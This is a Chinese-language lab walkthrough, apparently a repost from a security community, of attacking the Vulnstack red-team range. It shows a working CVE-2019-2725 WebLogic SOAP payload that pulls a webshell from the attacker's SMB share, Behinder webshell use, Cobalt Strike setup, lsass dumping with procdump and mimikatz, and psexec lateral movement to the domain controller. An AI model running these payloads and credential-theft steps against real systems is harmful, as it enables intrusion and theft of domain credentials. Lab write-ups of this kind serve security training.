靶场实战 | ATT&CK实战 Vulnstack 红队(二)

admin 2022年2月27日19:12:49评论145 views字数 4106阅读13分41秒阅读模式

本文来自“白帽子社区知识星球”

作者:Snakin

靶场实战 | ATT&CK实战 Vulnstack 红队(二)


白帽子社区知识星球

加入星球,共同进步
01

域环境初始化
DCIP:10.10.10.10 OSWindows 2012(64)应用:AD
WEBIP1:10.10.10.80 IP2:192.168.111.80 OSWindows 2008(64)应用:Weblogic 10.3.6 MSSQL 2008
PCIP1:10.10.10.201 IP2:192.168.111.201 OSWindows 7(32)应用:
攻击机IP:192.168.111.5 OSKali


02

weblogic漏洞利用

nmap扫描

nmap -p- -T5 192.168.111.80 -o web


-p- 表示扫描所有端口; 


-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快, 但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。


-o 保存扫描结果到文件web


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


常用端口是开放状态1433是mssql,7001我们知道是weblogic服务,因为我们前面手工 开启的。考虑weblogic服务漏洞,找到WeblogicScan工具扫一下。(WeblogicScan工具下载链接请在后台回复“工具链接”)


python3 WeblogicScan.py -u 192.168.111.80 -p 7001


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


发现一个漏洞


CVE-2019-2725漏洞描述

       这是一个Weblogic反序列化远程代码执行漏洞。部分版本 WebLogic中默认包含的 wls9_async_response 包,为WebLogic Server提供异步通 讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心 构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。


03

启动smbserver共享文件服务

我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。


impacket-smbserver share /root/桌面/Behinder/server &


POC:

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>copy \192.168.111.5shareshell.jsp
serversAdminServertmp_WL_internalbea_wls9_async_response8tpk
yswar1.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>


发包:


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


202状态码:Accepted 表示服务器端已经收到请求消息,但是尚未进行处理。但是对 于请求的处理却是无保证的,即稍后无法通过 HTTP 协议给客户端发送一个异步请 求来告知其请求的处理结果。这个状态码被设计用来将请求交由另外一个进程或者服 务器来进行处理,或者是对请求进行批处理的情形。


问题:发现无法访问共享的文件


04

使用漏洞利用工具上传shell

上传冰蝎的马


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


启动冰蝎

java -jar Behinder_v3.0_Beta6_linux.jar &


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


冰蝎连接

URL:http://192.168.111.80:7001/_async/shell.jsp
密码:rebeyond


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


连接成功


05

域渗透

CS上线:启动cs服务器,密码是123456

./teamserver 192.168.111.5 123456 &

启动客户端

./start.sh &

靶场实战 | ATT&CK实战 Vulnstack 红队(二)


接下来创建一个监听器


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


在Attacks中选择


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


选择之后保存,再利用冰蝎上传这个exe文件


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


接下来在虚拟终端中运行这个程序即可 

打开会话,将命令执行周期修改为2s


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


查看当前用户身份,为admin账户


靶场实战 | ATT&CK实战 Vulnstack 红队(二)

06


获取 win 用户明文密码



使用 procdump64+mimikatz 获取win用户明文密码


procdump64.exe 介绍:它的主要目的是监控应用程序的CPU异常动向, 并在此异常 时生成crash dump文件, 供研发人员和管理员确定问题发生的原因。 


lsass.exe 进程概述:lsass.exe是一个系统进程,用于微软Windows系统的安全机 制。它用于本地安全和登陆策略。也就是说lsass.exe进程运行后,里面会保存用户帐号和密码信息。


beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp


参数说明:

-accepteula参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。-ma 参数:生成full dump, 即包括进程的所有内存. 默认的dump格式包括线程和句柄信息.


解密,这里数字卫士没有拦击并不说明 mimikatz 是免杀的,实际环境如果 mimikatz 不是免杀的需 要将 lsass.dmp 文件拖回本地放至相同的系统中进行解密。


shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
"exit"> password.txt


直接使用 download 命令下载,下载后会保存到程序目录的 downloads 目录。

07

使用CS进行凭据搜集
hashdump
logonpasswords


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


目前得到域用户信息:


域用户名:de1aymssql          密码:1qaz@WSX域用户名:de1ayadministrator  密码:1qaz@WSX #这是DC域管理员用户和密码本地用户名:WEBde1ay          密码:1qaz@WSX 该用户是系统本地登录系统用的。

08

获取域控

查看网络信息找到域控

beacon> shell ipconfig /all


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


DNS 服务器 10.10.10.10 也就是域控。查看域控制器


beacon> shell net group "domain controllers" /domain


获得:

主机名:DC,完整主机是:DC.de1ay.com再确认主机名为DCIP地址:beacon> shell ping dc或:beacon> shell ping DC


成功ping通


靶场实战 | ATT&CK实战 Vulnstack 红队(二)

接下来查看域管理员

shell net group "domain admins" /domain

09

连接域控服务器-反弹域控shell

回到控制目标主机的初始用户账户下

beacon> rev2self

查看当前的权限:

beacon> getuid


通过前面获取到的DC的DE1AYadministrator账户信息,生成新的凭证。


beacon> make_token DE1AYadministrator 1qaz@WSX


创建新的监听实现中转,便于通过命名管道 psexec 通过 SMB Listener 横向过去。


靶场实战 | ATT&CK实战 Vulnstack 红队(二)


名称就叫smb这个后面要用。

DC上线,jump会使用前面的凭证和smb监听器,完成登录DC的过程.

beacon> jump psexec DC smb或:jump psexec 10.10.10.10 smb #目标机器可以是 DC 主机名,也可以是 IP

靶场实战 | ATT&CK实战 Vulnstack 红队(二)


拿下域控


靶场实战 | ATT&CK实战 Vulnstack 红队(二)

如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。

▼扫码关注白帽子社区公众号&加入知识星球▼


靶场实战 | ATT&CK实战 Vulnstack 红队(二)
靶场实战 | ATT&CK实战 Vulnstack 红队(二)

原文始发于微信公众号(白帽子社区):靶场实战 | ATT&CK实战 Vulnstack 红队(二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年2月27日19:12:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场实战 | ATT&CK实战 Vulnstack 红队(二)http://cn-sec.com/archives/806083.html

发表评论

匿名网友 填写信息